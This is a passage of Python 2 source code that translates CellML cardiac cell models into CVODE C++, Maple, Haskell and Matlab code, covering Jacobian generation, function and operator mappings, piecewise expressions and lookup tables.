self.output_constructor(['boost::shared_ptr<AbstractIvpOdeSolver> pOdeSolver /* unused; should be empty */',
'boost::shared_ptr<AbstractStimulusFunction> pIntracellularStimulus'],
['pOdeSolver', len(self.state_vars), self.unsigned_v_index, 'pIntracellularStimulus'])
# Destructor
self.output_method_start('~'+self.class_name, [], '', access='public')
self.open_block()
self.close_block()
# Other declarations & methods
self.output_chaste_lut_methods()
self.output_verify_state_variables()
def output_mathematics(self):
"""Output the mathematics in this model.
Two methods are needed:
* EvaluateYDerivatives computes the RHS of the ODE system
* GetIIonic returns the total ionic current
"""
self.output_get_i_ionic()
self.output_evaluate_y_derivatives(method_name='EvaluateYDerivatives')
if self.use_analytic_jacobian:
self.output_jacobian()
self.output_derived_quantities()
def output_bottom_boilerplate(self):
"""Call superclass method, then end the CHASTE_CVODE guard."""
super(CellMLToCvodeTranslator, self).output_bottom_boilerplate()
# CVODE is optional in Chaste
self.writeln("#endif // CHASTE_CVODE")
self.writeln_hpp("#endif // CHASTE_CVODE")
def output_extra_constructor_content(self):
"""Tell the base class if we have an analytic Jacobian."""
if self.use_analytic_jacobian:
self.writeln('mUseAnalyticJacobian = true;')
self.writeln('mHasAnalyticJacobian = true;')
def _count_operators(self, exprs, result=None):
if result is None: result = {}
for expr in exprs:
if isinstance(expr, mathml_apply):
op = expr.operator().localName
result[op] = 1 + result.get(op, 0)
children = expr.xml_element_children()
if children:
self._count_operators(children, result)
return result
def output_jacobian(self):
"""Output an analytic Jacobian for CVODE to use."""
self.output_method_start('EvaluateAnalyticJacobian',
['long int N', self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
self.TYPE_VECTOR + 'rY', self.TYPE_VECTOR + 'rDY',
'CHASTE_CVODE_DENSE_MATRIX rJacobian',
self.TYPE_VECTOR + 'rTmp1', self.TYPE_VECTOR + 'rTmp2', self.TYPE_VECTOR + 'rTmp3'],
'void', access='public')
self.open_block()
# Mathematics that the Jacobian depends on
used_vars = set([self.config.dt_variable])
for entry in self.model.solver_info.jacobian.entry:
used_vars.update(self._vars_in(entry.math))
nodeset = self.calculate_extended_dependencies(used_vars, prune_deps=[self.doc._cml_config.i_stim_var])
self.output_state_assignments(nodeset=nodeset, assign_rY=False)
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset|set(map(lambda e: e.math, self.model.solver_info.jacobian.entry)), self.code_name(self.free_vars[0]))
self.output_equations(nodeset - table_index_nodes_used)
self.writeln()
# Jacobian entries, sorted by index with rows varying fastest
self.output_comment('Matrix entries')
entries = []
def gv(vn):
return self.varobj(vn).get_source_variable(recurse=True)
for entry in self.model.solver_info.jacobian.entry:
var_i, var_j = gv(entry.var_i), gv(entry.var_j)
i = self.state_vars.index(var_i)
j = self.state_vars.index(var_j)
entry_content = list(entry.math.xml_element_children())
assert len(entry_content) == 1, "Malformed Jacobian entry: " + entry.xml()
entry = entry_content[0]
if not (isinstance(entry, mathml_cn) and entry.evaluate() == 0.0):
entries.append((j, i, var_i is self.v_variable, entry))
entries.sort()
for j, i, is_V, entry in entries:
self.writeln('DENSE_ELEM(rJacobian, ', i, ', ', j, ') = ', self.code_name(self.config.dt_variable), ' * (', nl=False)
paren = False
if is_V:
self.write('mSetVoltageDerivativeToZero ? 0.0 : ')
paren = True
self.output_expr(entry, paren)
self.writeln(')', self.STMT_END, indent=False)
# self.output_comment('Debugging!')
# self.writeln('#ifndef NDEBUG', indent=False)
# self.writeln('for (long int j=0; j<N; j++)')
# self.open_block()
# self.writeln('for (long int i=0; i<N; i++)')
# self.open_block()
# self.writeln('if (std::isnan(DENSE_ELEM(rJacobian, i, j)))')
# self.open_block()
# self.writeln('std::cerr << "NAN at J(" << i << "," << j << ")" << DumpState("", rY);')
# self.close_block(blank_line=False)
# self.writeln('EXCEPT_IF_NOT(!std::isnan(DENSE_ELEM(rJacobian, i, j)));')
# self.close_block(blank_line=False)
# self.close_block(blank_line=False)
# self.writeln('//CheckAnalyticJacobian(', self.code_name(self.free_vars[0]),
# ', rY, rDY, rJacobian, rTmp1, rTmp2, rTmp3);')
# self.writeln('#endif // NDEBUG', indent=False)
self.close_block()
class CellMLToMapleTranslator(CellMLTranslator):
"""Translate a CellML model to Maple code."""
# Language tokens that differ from the default
EQ_ASSIGN = ' := ' # Assignment operator
COMMENT_START = '# ' # Start of a 1 line comment
# Types are determined automatically by Maple
TYPE_DOUBLE = ''
TYPE_CONST_DOUBLE = ''
# Some constants are different
PI = 'Pi'
E = 'exp(1)'
def __init__(self, omit_constants=False, compute_full_jacobian=False,
**kwargs):
"""Create a Maple translator.
If omit_constants is set to true, assignments will not be
generated for constant variables. This should be used if
these values will be altered at runtime, in order to prevent
derivatives being calculated incorrectly.
Set compute_full_jacobian to True to make Maple compute the
Jacobian of the whole ODE system, rather than just the
nonlinear portion.
Other keyword arguments are all passed to the base class.
"""
super(CellMLToMapleTranslator, self).__init__(**kwargs)
# Maple translation doesn't support lookup tables
self.use_lookup_tables = False
# Translation parameters
self.omit_constants = omit_constants
self.compute_full_jacobian = compute_full_jacobian
# Update some function names
self.function_map = CellMLTranslator.function_map.copy()
del self.function_map['power']
self.function_map.update(
{'abs': 'abs', 'ln': 'ln', 'not': 'not',
'sec': 'sec', 'csc': 'csc', 'cot': 'cot',
'sech': 'sech', 'csch': 'csch', 'coth': 'coth',
'arcsin': 'arcsin', 'arccos': 'arccos', 'arctan': 'arctan',
'arcsec': 'arcsec', 'arccsc': 'arccsc', 'arccot': 'arccot',
'arcsinh': 'arcsinh', 'arccosh': 'arccosh', 'arctanh': 'arctanh',
'arcsech': 'arcsech', 'arccsch': 'arccsch', 'arccoth': 'arccoth'})
self.recip_trig = {}
self.nary_ops = CellMLTranslator.nary_ops.copy()
self.nary_ops.update({'and': 'and', 'or': 'or'})
self.binary_ops = CellMLTranslator.binary_ops.copy()
self.binary_ops.update({'xor': 'xor', 'eq': '=', 'neq': '<>',
'power': '^'})
self.special_roots = {}
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.mpl'
def output_top_boilerplate(self):
"""Output top boilerplate."""
self.writeln('# Model: ', self.model.name)
self.output_comment(version_comment(self.add_timestamp))
self.writeln()
self.writeln('interface(prettyprint=0);\n')
if self.compute_full_jacobian:
self.writeln('print("FULL JACOBIAN");')
return
#
# def output_mathematics(self):
# if self.compute_full_jacobian:
# pass
# else:
# super(CellMLToMapleTranslator, self).output_mathematics()
def output_bottom_boilerplate(self):
"""Output bottom boilerplate."""
self.output_comment('\nJacobian calculation\n')
if self.compute_full_jacobian:
state_vars = self.state_vars
# Record the ordering of the state variables, since they're refered to by index below
for i, var in enumerate(state_vars):
self.writeln('print("--%d--%s--");' % (i+1, self.code_name(var)))
# Jacobian calculation for the whole ODE system, i.e. each df_i/du_j
state_var_names = map(self.code_name, state_vars)
self.writeln('jacobian', self.EQ_ASSIGN, 'array(')
self.write('[')
for var_i in state_vars:
if var_i is not state_vars[0]: self.write(',')
self.write('[')
for var_j in state_vars:
if var_j is not state_vars[0]: self.write(',')
self.write('diff(', self.code_name(var_i, ode=True), ',', self.code_name(var_j), ')')
self.write(']')
self.write(']);\n')
self.writeln('with(codegen):')
self.writeln('J', self.EQ_ASSIGN, 'optimize(jacobian);')
elif hasattr(self.model, '_cml_nonlinear_system_variables'):
# Jacobian calculation for Jon Whiteley's algorithm
vars_text = self.model._cml_nonlinear_system_variables
if type(vars_text) == type([]):
var_objs = self.model._cml_nonlinear_system_variables
else:
# Get variable objects from names
varnames = map(lambda s: s.split(','), vars_text.split(';'))
var_objs = map(lambda (c, v):
self.model.get_variable_by_name(c, v),
varnames)
# Output the Newton iteration expression for each variable
for var in var_objs:
self.writeln('g_', self.code_name(var), self.EQ_ASSIGN,
self.code_name(var), ' - ',
self.code_name(var), '_old - delta_t*',
self.code_name(var, ode=True), self.STMT_END)
# Output the derivative calculations
for var_i in var_objs:
for var_j in var_objs:
self.writeln('print("--', self.code_name(var_i), '/',
self.code_name(var_j), '--");')
self.writeln('diff(g_', self.code_name(var_i), ', ',
self.code_name(var_j), ');')
# Tell Maple to quit when done
self.writeln()
self.writeln('quit;')
return
def output_assignment(self, expr):
"""Output an assignment expression.
Optionally, if this is an assignment of a constant, don't output,
so that differentation doesn't optimise expressions away.
"""
if isinstance(expr, cellml_variable):
# This may be the assignment of a mapped variable, or a constant
t = expr.get_type()
if t == VarTypes.Mapped:
self.writeln(self.TYPE_DOUBLE, self.code_name(expr),
self.EQ_ASSIGN,
self.code_name(expr.get_source_variable()),
self.STMT_END)
elif t == VarTypes.Constant and not self.omit_constants:
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(expr),
self.EQ_ASSIGN, nl=False)
self.output_number(expr.initial_value)
self.writeln(self.STMT_END, indent=False)
else:
# This is a mathematical expression
self.writeln(self.TYPE_DOUBLE, nl=False)
opers = expr.operands()
self.output_lhs(opers.next())
self.write(self.EQ_ASSIGN)
self.output_expr(opers.next(), False)
self.writeln(self.STMT_END, indent=False)
return
def output_number(self, expr):
"""Output the plain number expr.
With Maple, there is no need to make all constants parse as
doubles to avoid problems with integer division or numbers too
large for the int type.
Negative numbers will be prefixed by a space to avoid unwanted
decrement operations.
"""
n = self.eval_number(expr)
num = "%.17g" % n
if num[0] == '-':
num = '(' + num + ')'
self.write(num)
def output_root(self, expr, paren):
"""Output a root taken to some degree.
If a degree qualifier element is not provided, uses default 2.
"""
if hasattr(expr, u'degree'):
# A degree is given. Compute x^(1/b)
self.open_paren(paren)
self.output_expr(expr.operands().next(), True)
self.write('^(1/')
self.output_expr(expr.degree, True)
self.write(')')
self.close_paren(paren)
else:
# Compute square root
self.output_function('sqrt', expr.operands(), paren)
def output_log(self, expr, paren):
"""Output a logarithm to the given base, which defaults to base 10."""
if hasattr(expr, u'logbase'):
# A base is provided. Use the log[b](x) function.
self.write('log[')
self.output_expr(expr.logbase, False)
self.write(']')
self.output_function('', expr.operands(), paren)
else:
# Use base 10
self.output_function('log10', expr.operands(), paren)
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr.
We use the if operator.
"""
self.write('piecewise(')
need_comma = False
for piece in getattr(expr, u'piece', []):
if need_comma:
self.write(',')
self.output_expr(child_i(piece, 2), False) # Condition
self.write(',')
self.output_expr(child_i(piece, 1), False) # Result
need_comma = True
if hasattr(expr, u'otherwise'):
if need_comma:
self.write(',')
self.output_expr(child_i(expr.otherwise, 1), paren) # Default case
self.write(')')
class CellMLToHaskellTranslator(CellMLTranslator):
"""Translate a CellML model to a Haskell version.
This does not produce a 'runnable' version of the model, but
rather an equivalent model in effectively an abstract syntax,
which can then be interpreted by a suitable interpreter.
This allows us to more easily specify an operational semantics for
CellML, without having to worry about the XML issues in the
interpreter itself.
"""
STMT_END = ''
COMMENT_START = '-- '
TYPE_DOUBLE = ''
TYPE_CONST_DOUBLE = ''
E = '(exp 1)'
PI = 'pi'
TRUE = '(Bool True)'
FALSE = '(Bool False)'
def __init__(self, **kwargs):
"""Create a Haskell translator.
Keyword arguments are all passed to the base class.
"""
super(CellMLToHaskellTranslator, self).__init__(**kwargs)
# We don't use lookup tables in Haskell code
self.use_lookup_tables = False
return
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
return os.path.splitext(model_filename)[0] + '.hs'
def stringify(self, s):
"""Quote a string."""
return '"' + s + '"'
def code_name(self, var, ode=False, full=False):
"""
Return the full name of var in a form suitable for inclusion in a
source file.
The functionality of ode=True is implemented in output_apply
rather than here, so this parameter must be False.
If full is True, include the name of the owning component.
If PE has been performed (there is only 1 component, and variable
names have been munged) then transform the munged name to Haskell
munged form.
"""
if ode:
raise NotImplementedError # Never used; see output_apply.
if self.single_component and '__' in var.name:
name = var.name.replace('__', ',')
elif full:
name = var.xml_parent.name + ',' + var.name
else:
name = var.name
return self.stringify(name)
def output_top_boilerplate(self):
"""Output top boilerplate.
Outputs the imports and model-level units definitions.
Components and connections are output by output_mathematics.
"""
self.class_name = self.class_name.lower()
self.module_name = self.class_name[0].upper() + self.class_name[1:]
self.writeln('module ', self.module_name, ' where')
self.writeln('-- Model: ', self.model.name)
self.output_comment(version_comment(self.add_timestamp))
self.writeln()
self.writeln('import CellML')
self.writeln('import Units')
self.writeln('import Environment')
self.writeln()
# Model definition
self.writeln(self.class_name, ' = Model ',
self.stringify(self.class_name),
' units components connections')
self.writeln(' where')
self.set_indent(offset=1)
# Model-level units definitions
self.writeln('units =')
self.output_units(self.model)
return
def output_unit(self, udef):
"""Output a single units definition, recursively."""
def prefix(uref):
"""Return a prefix of a units reference,
as an integer to which 10 may be raised."""
prefix = getattr(uref, u'prefix_', 0)
if prefix in uref.SI_PREFIXES:
prefix = uref.SI_PREFIXES[prefix]
else:
prefix = int(prefix)
return prefix
def num(n):
"""Wrap numbers for Haskell."""
if n < 0:
return "(" + str(n) + ")"
else:
return n
self.write('(')
if udef.is_base_unit():
# Base unit
self.write('BaseUnits ', self.stringify(udef.name))
elif udef.is_simple():
# Simple units
self.write('SimpleUnits ', num(udef.get_multiplier()), ' ',
num(prefix(udef.unit)), ' ')
self.output_unit(udef.unit.get_units_element())
self.write(' ', num(udef.get_offset()))
else:
# Complex units
self.write('ComplexUnits [')
uref_comma = False
for uref in udef.unit:
if uref_comma: self.write(',')
else: uref_comma = True
self.write('Unit ', num(uref.get_multiplier()), ' ',
num(prefix(uref)), ' ')
self.output_unit(uref.get_units_element())
self.write(' ', num(uref.get_exponent()))
self.write(']')
self.write(')')
return
def output_units(self, units_parent):
"""Output the units definitions in this model or component."""
self.open_list()
comma, output = False, False
for udef in getattr(units_parent, u'units', []):
output = True
if comma: self.writeln(',', indent=False)
else: comma = True
# Output a single definition
self.writeln('UDef ', self.stringify(udef.name), nl=False)
self.output_unit(udef)
if output:
self.writeln('', indent=False)
self.close_list()
return
def output_mathematics(self):
"""Output the mathematics in this model.
This method outputs the components and connections."""
# Components
self.writeln('components =')
self.open_list()
comma = False
for comp in getattr(self.model, u'component', []):
if comma: self.writeln(',')
else: comma = True
self.output_component(comp)
self.writeln('')
self.close_list()
# Connections
self.writeln('connections =')
self.open_list()
comma = False
for var in (v for v in self.model.get_assignments()
if isinstance(v, cellml_variable)
if v.get_type() == VarTypes.Mapped):
if comma: self.writeln(',', indent=False)
else: comma = True
self.output_connection(var)
self.writeln('', indent=False)
self.close_list()
return
def output_component(self, comp):
"""Output a single component."""
self.writeln('MkComp ', self.stringify(comp.name))
self.output_units(comp)
# Variable declarations, associating units with var names
self.open_list()
comma = False
for var in getattr(comp, u'variable', []):
if comma: self.writeln(',')
else: comma = True
self.writeln('VarDecl ', self.code_name(var), ' ',
self.stringify(var.units))
self.close_list()
# And now the mathematics
self.open_list()
comma = False
# Constants
for var in (v for v in getattr(comp, u'variable', [])
if v.get_type() == VarTypes.Constant):
if comma: self.writeln(',')
else: comma = True
self.output_assignment(var)
# Expressions
for math in getattr(comp, u'math', []):
for expr in getattr(math, u'apply', []):
if comma: self.writeln(',')
else: comma = True
self.output_assignment(expr)
self.close_list()
return
def output_connection(self, conn):
"""Output a single connection."""
to_var = conn
from_var = conn.get_source_variable()
self.writeln('VarMap', nl=False)
self.write(' (', self.stringify(from_var.xml_parent.name), ',',
self.stringify(from_var.name), ')')
self.write(' (', self.stringify(to_var.xml_parent.name), ',',
self.stringify(to_var.name), ')')
return
def output_bottom_boilerplate(self):
"""Output bottom boilerplate."""
self.set_indent(offset=-1)
self.writeln()
self.output_comment('Evaluate derivatives at the start of time.')
self.writeln()
# Initial environment
self.writeln('initial_environment :: Env')
self.writeln('initial_environment = make_env')
self.open_list()
self.writeln(' (Var ', self.code_name(self.free_vars[0], full=True),
', Val (Number 0))')
for sv in self.state_vars:
self.writeln(', (Var ', self.code_name(sv, full=True),
', Val ', nl=False)
self.output_number(sv.initial_value, as_value=True)
self.writeln(')', indent=False)
self.close_list()
self.writeln('results = run_cellml ', self.class_name,
' initial_environment')
self.writeln()
# Dynamic environment for PE
self.writeln('dynamic_environment :: Env')
self.writeln('dynamic_environment = foldr def initial_environment')
self.open_list()
# Include all variables marked as pe:keep
comma = False
for comp in getattr(self.model, u'component', []):
for var in getattr(comp, u'variable', []):
if var.pe_keep:
self.writeln([' ', ','][comma], ' (Var ',
self.code_name(var, full=True),
', Val DynamicMarker)')
if not comma: comma = True
self.close_list()
self.writeln('where def (k,v) env = define env k v', indent_offset=1)
self.writeln('pe_results = reduce_and_run_cellml ', self.class_name,
' dynamic_environment')
return
def open_list(self):
"""Open a multi-line list."""
self.set_indent(offset=1)
self.writeln('[')
self.set_indent(offset=1)
return
def close_list(self):
"""Close a multi-line list."""
self.set_indent(offset=-1)
self.writeln(']')
self.set_indent(offset=-1)
return
def output_assignment(self, expr):
"""Output an assignment expression."""
if isinstance(expr, cellml_variable):
# Assignment of a constant
self.writeln('Assign (Var ', self.code_name(expr), ') ', nl=False)
self.output_number(expr.initial_value, units=expr.units)
self.writeln(indent=False)
else:
# This is a mathematical expression
opers = expr.operands()
self.writeln('Assign ', nl=False)
self.output_lhs(opers.next())
self.write(' ')
self.output_expr(opers.next(), True)
self.writeln(indent=False)
return
def output_lhs(self, expr):
"""Output the left hand side of an assignment expression."""
if expr.localName == 'ci':
self.output_variable(expr, lhs=True)
elif expr.operator().localName == 'diff':
v1 = expr.operator().dependent_variable
v2 = expr.operator().independent_variable
self.write('(Ode ', self.code_name(v1), ' ', self.code_name(v2),
')')
return
def output_variable(self, ci_elt, lhs=False):
"""Output a ci element, i.e. a variable lookup."""
type_constructor = ['Variable', 'Var'][lhs]
self.write('(', type_constructor, ' ',
self.code_name(ci_elt.variable), ')')
return
def output_number(self, expr, as_value=False, units=None):
"""Output the plain number expr.
With Haskell there is no need to force numbers to parse as doubles.
We do need to bracket negative numbers.
"""
n = self.eval_number(expr)
num = "%.17g" % n
if num[0] == '-':
num = "(" + num + ")"
tc = ['Num', 'Number'][as_value]
if not as_value:
if units is None:
units = getattr(expr, u'units', '')
units = '(Left ' + self.stringify(units) + ')'
else:
units = ''
self.write("(", tc, " ", num, " ", units, ")")
return
def output_apply(self, expr, paren):
"""Output an <apply> expression.
paren is True if the context has requested parentheses.
"""
op = expr.operator()
op_name = op.localName.capitalize()
self.open_paren(paren)
# Some operators are special-cased, but most map directly
if op_name == u'Root':
self.output_special_apply(expr, u'Root', u'degree', u'Sqrt')
elif op_name == u'Log':
self.output_special_apply(expr, u'Log', u'logbase', u'Ln')
elif op_name == u'Diff':
if self.single_component:
# A bit of a hack, due to the odd way this case is
# handled by other translators - in effect the
# translator has to do some PE...
self.write('Apply Diff [Variable ',
self.code_name(
op.dependent_variable.get_source_variable(recurse=True)),
', Variable ',
self.code_name(
op.independent_variable.get_source_variable(recurse=True)),
']')
else:
self.really_output_apply(op_name, list(expr.operands()) +
[expr.bvar.ci])
else:
self.really_output_apply(op_name, expr.operands())
self.close_paren(paren)
return
def really_output_apply(self, operator, operands):
"""Actually output code for the application of an operator."""
self.write('Apply ', operator, ' [')
comma = False
for operand in operands:
if comma: self.write(',')
else: comma = True
self.output_expr(operand, False)
self.write(']')
return
def output_special_apply(self, expr, op_name, qual_name, special_name):
"""Output a special-cased apply expression.
op_name is the name of the general case operator. If the
expression has a qualifier called qual_name, this will be
used, with the qualifier's value as second operand. Otherwise,
the operator special_name will be used, with a single operand.
"""
if hasattr(expr, qual_name):
self.really_output_apply(op_name, [expr.operands().next(),
getattr(self, qual_name)])
else:
self.really_output_apply(special_name, expr.operands())
return
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr."""
self.open_paren(paren)
self.write('Piecewise [')
comma = False
for piece in getattr(expr, u'piece', []):
if comma: self.write(',')
else: comma = True
self.write('Case ')
self.output_expr(child_i(piece, 2), True) # Condition
self.write(' ')
self.output_expr(child_i(piece, 1), True) # Result
self.write('] ')
if hasattr(expr, u'otherwise'):
self.write('(Just ')
self.output_expr(child_i(expr.otherwise, 1), True) # Default case
self.write(')')
else:
self.write('Nothing')
self.close_paren(paren)
return
class CellMLToMatlabTranslator(CellMLTranslator):
"""Translate a CellML model to Matlab code.
The normal case generates a .m file such as could be used with ode45.
When lookup tables are used (TODO), the file generated represents a
function that returns a function handle, suitable for use with ODE
solvers.
"""
# Language tokens that differ from the default
COMMENT_START = '% ' # Start of a 1 line comment
# Types are determined automatically by Matlab
TYPE_DOUBLE = ''
TYPE_CONST_DOUBLE = ''
# Some constants are different
PI = 'pi'
E = 'exp(1)'
NOT_A_NUMBER = 'NaN'
def __init__(self, **kwargs):
super(CellMLToMatlabTranslator, self).__init__(**kwargs)
# Update some function, etc. names
self.function_map = CellMLTranslator.function_map.copy()
self.function_map.update(
{'power': 'power', 'abs': 'abs',
'xor': 'xor', 'not': '~', 'rem': 'rem',
'sec': 'sec', 'csc': 'csc', 'cot': 'cot',
'sech': 'sech', 'csch': 'csch', 'coth': 'coth',
'arcsec': 'asec', 'arccsc': 'acsc', 'arccot': 'acot',
'arcsech': 'asech', 'arccsch': 'acsch', 'arccoth': 'acoth'
})
self.recip_trig = {}
self.binary_ops = CellMLTranslator.binary_ops.copy()
del self.binary_ops['xor']
self.binary_ops['neq'] = '~='
self.binary_ops['divide'] = './'
self.nary_ops = CellMLTranslator.nary_ops.copy()
self.nary_ops['times'] = '.*'
self.special_roots = {2: 'sqrt'}
def output_file_name(self, model_filename):
"""Generate a name for our output file, based on the input file."""
name = os.path.splitext(model_filename)[0] + '.m'
# Matlab doesn't like long names :(
if len(name) > 60:
# Take end part so we get version/variant info if present
name = name[-60:]
return name
def translate(self, doc, *args, **kwargs):
"""Generate code for the model or its Jacobian matrix."""
self.variable_name_map = {}
if hasattr(doc.model, u'solver_info') and \
hasattr(doc.model.solver_info, u'jacobian'):
kwargs['continuation'] = self.output_jacobian
if 'output_filename' in kwargs and len(kwargs['output_filename'])>60:
# Take end part so we get version/variant info if present
kwargs['output_filename'] = kwargs['output_filename'][-60:]
return super(CellMLToMatlabTranslator,
self).translate(doc, *args, **kwargs)
def output_top_boilerplate(self):
"""Output top boilerplate."""
self.output_comment(version_comment(self.add_timestamp))
t = self.code_name(self.free_vars[0])
# Matlab doesn't like long names :(
if len(self.class_name) > 60:
# Take end part so we get version/variant info if present
self.class_name = self.class_name[-60:]
# Strip leading underscores
while self.class_name[0] == '_':
self.class_name = self.class_name[1:]
if self.use_lookup_tables:
self.writeln('function dy_fun_ptr = ', self.class_name, '_lt(step)')
self.output_comment('Generate a function to evaluate using '
'lookup tables the model ', self.model.name, '.')
self.output_comment('The function returned is f, where dU/dt = f(t, U).')
self.writeln()
self.set_indent(offset=1)
self.output_lut_generation()
self.output_lut_lookups()
self.writeln('tables = generate_tables(step);')
else:
self.writeln('function [dy_fun_ptr initial_values V_index t_units state_var_names] = ',
self.class_name, '()')
self.output_comment('Get evaluation function and metadata for the model ',
self.model.name, '.')
self.output_comment('\nReturns the function f (where dU/dt = f(t, U)),\n'
'suitable initial values for the system,\n'
'the index of the transmembrane potential within '
'the state variable vector,\n'
'the multiplicative factor of the time units,\n'
'and the names of the state variables.')
self.set_indent(offset=1)
self.writeln('V_index = ', self.v_index+1, ';')
self.writeln('state_var_names = cell(1, ', len(self.state_vars), ');')
self.writeln('initial_values = zeros(1, ', len(self.state_vars), ');')
for i, var in enumerate(self.state_vars):
self.writeln('state_var_names{', i+1, '}', self.EQ_ASSIGN,
"'", var.fullname(), "';")
self.writeln('initial_values(', i+1, ')', self.EQ_ASSIGN,
getattr(var, u'initial_value', self.NOT_A_NUMBER), ';')
t_var = self.free_vars[0]
t_units = t_var.component.get_units_by_name(t_var.units)
self.writeln('t_units = ', t_units.get_multiplicative_factor(), ';')
self.writeln('function dy = dy_fun(',t,', y)')
self.set_indent(offset=1)
self.output_comment('Time units: ', self.free_vars[0].units)
self.writeln()
for i, var in enumerate(self.state_vars):
self.writeln(self.code_name(var), self.EQ_ASSIGN, 'y(', i+1,
');')
self.output_comment('Units: ', var.units, '; Initial value: ',
getattr(var, u'initial_value', 'Unknown'))
self.writeln()
if self.use_lookup_tables:
for key, i in self.doc.lookup_table_indexes.iteritems():
i = int(i) + 1
min, max, step, var = key
varname = self.code_name(var)
self.writeln('table_values{', i, '} = lookup_', i,
'(tables, ', varname, ', step);')
self.writeln()
return
def output_bottom_boilerplate(self):
"""Output bottom boilerplate."""
self.writeln()
self.writeln('dy = zeros(size(y));')
for i, var in enumerate(self.state_vars):
self.writeln('dy(', str(i+1), ') = ',
self.code_name(var, ode=True), ';')
self.set_indent(offset=-1)
self.writeln('end')
self.writeln()
self.writeln('dy_fun_ptr = @dy_fun;')
self.set_indent(offset=-1)
self.writeln('end')
def code_name(self, var, ode=False, shorten=True):
"""Matlab has an upper limit on the length of variable names!"""
full_name = super(CellMLToMatlabTranslator, self).code_name(var, ode)
if shorten:
full_name = self.shorten_name(full_name)
return full_name
def shorten_name(self, var_name):
"""If the name is too long for Matlab, shorten it."""
if len(var_name) > 60:
# Actual bound is 63, but let's be cautious
try:
return self.variable_name_map[var_name]
except KeyError:
new_name = 'shortened_var_' + str(len(self.variable_name_map))
self.variable_name_map[var_name] = new_name
return new_name
else:
return var_name
def output_number(self, expr):
"""Output the plain number expr.
With Matlab, there is no need to make all constants parse as
doubles to avoid problems with integer division or numbers too
large for the int type.
Negative numbers will be prefixed by a space to avoid unwanted
decrement operations.
"""
n = self.eval_number(expr)
num = "%.17g" % n
if num[0] == '-':
num = ' ' + num
self.write(num)
def output_root(self, expr, paren):
"""Output a root taken to some degree.
If a degree qualifier element is not provided, uses default 2.
"""
if hasattr(expr, u'degree'):
# A degree is given. Compute nthroot(x, b)
x = expr.operands().next()
b = expr.degree
self.output_function('nthroot', [x, b], paren)
else:
# Compute square root
self.output_function('sqrt', expr.operands(), paren)
def output_piecewise(self, expr, paren):
"""Output the piecewise expression expr.
Uses an ifexpr.m file to code if expressions.
"""
num_ifs = 0
for piece in getattr(expr, u'piece', []):
num_ifs += 1
self.write('ifexpr(')
self.output_expr(child_i(piece, 2), False) # Condition
self.write(',')
self.output_expr(child_i(piece, 1), False) # Result
self.write(',')
if hasattr(expr, u'otherwise'):
self.output_expr(child_i(expr.otherwise, 1), paren) # Default case
else:
self.write(self.NOT_A_NUMBER) # If this is hit, things get ugly
for i in range(num_ifs):
self.close_paren(True)
def output_lut_generation(self):
"""Output code to generate lookup tables.
There should be a list of suitable expressions available as
self.doc.lookup_tables, to save having to search the whole
model.
"""
self.writeln('function tables = generate_tables(step)')
self.set_indent(offset=1)
self.output_comment('Generate all the lookup tables for this model.\n'
'Returns a cell array containing matrices, each column of '
'which contain one table.')
self.use_lookup_tables = False
for key, idx in self.doc.lookup_table_indexes.iteritems():
min, max, step, var = key
i = int(idx) + 1
table_extent = unicode(float(max) - float(min))
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln('tables{', i, '} = zeros(1+floor(', table_extent, '/step),',
num_tables, ');')
for expr in self.doc.lookup_tables:
j = int(expr.table_name) + 1
i = int(expr.table_index) + 1
var = expr.get_component().get_variable_by_name(expr.var)
varname = self.code_name(var)
self.writeln(varname, ' = [', expr.min, ':step:', expr.max, '];')
self.writeln('tables{', i, '}(:,', j, ') = ', nl=False)
self.output_expr(expr, False)
self.writeln(';', indent=False)
self.use_lookup_tables = True
self.set_indent(offset=-1)
self.writeln('end')
self.writeln()
def output_lut_lookups(self):
"""Output the functions that perform table lookups."""
for key, idx in self.doc.lookup_table_indexes.iteritems():
i = int(idx) + 1
min, max, step, var = key
self.writeln('function val = lookup_', i, '(tables, var, step)')
self.set_indent(offset=1)
self.output_comment('Lookup all tables for variable var')
self.writeln('if ~isreal(var)')
self.writeln("error(['Index variable value ' num2str(var) ' is not real'])",
indent_offset=1)
self.writeln('end')
self.writeln('table_lower = ', min, ';')
self.writeln('table_upper = ', max, ';')
self.writeln('if var < table_lower || var >= table_upper')
self.writeln("error(['Index variable value ' num2str(var) ' outside table bounds'])",
indent_offset=1)
self.writeln('end')
self.writeln('i = 1 + floor((var - table_lower)/step);')
self.writeln('y1 = tables{', i, '}(i, :);')
self.writeln('y2 = tables{', i, '}(i+1, :);')
self.writeln('var_i = table_lower + step*(i-1);')
self.writeln('val = y1 + (y2-y1) .* (var-var_i) ./ step;')
self.set_indent(offset=-1)
self.writeln('end')
self.writeln()
def output_table_lookup(self, expr, paren):
"""Output code to look up expr in the appropriate table."""
i = int(expr.table_index) + 1
j = int(expr.table_name) + 1
self.write('table_values{', i, '}(', j, ')')
def output_jacobian(self):
"""Generate code to compute the Jacobian matrix for this model."""
t = self.code_name(self.free_vars[0])
self.writeln('function J = jacobian(',t,', y)')
self.set_indent(offset=1)
self.output_comment('Jacobian matrix for the model ', self.model.name)
self.output_comment('Evaluates the matrix J, where J(j,i) = d f_i / d u_j')
# State variable assignments
for i, var in enumerate(self.state_vars):
self.writeln(self.code_name(var), self.EQ_ASSIGN, 'y(', str(i+1),
');')
self.output_comment('Units: ', var.units, '; Initial value: ',
getattr(var, u'initial_value', 'Unknown'))
# Mathematics that the Jacobian depends on
used_vars = set()
for entry in self.model.solver_info.jacobian.entry:
used_vars.update(self._vars_in(entry.math))
nodeset = self.calculate_extended_dependencies(used_vars)
self.output_equations(nodeset)
self.writeln()
# Jacobian entries
state_var_names = map(lambda v: self.code_name(v, shorten=False),
self.state_vars)
self.writeln('J = zeros(length(y));')
for entry in self.model.solver_info.jacobian.entry:
var_i, var_j = entry.var_i, entry.var_j
i = state_var_names.index(var_i) + 1
j = state_var_names.index(var_j) + 1
self.writeln('J(', j, ',', i, ') = ', nl=False)
entry_content = list(entry.math.xml_element_children())
assert len(entry_content) == 1
self.output_expr(entry_content[0], False)
self.writeln(self.STMT_END, indent=False)
self.set_indent(offset=-1)
self.writeln('end')
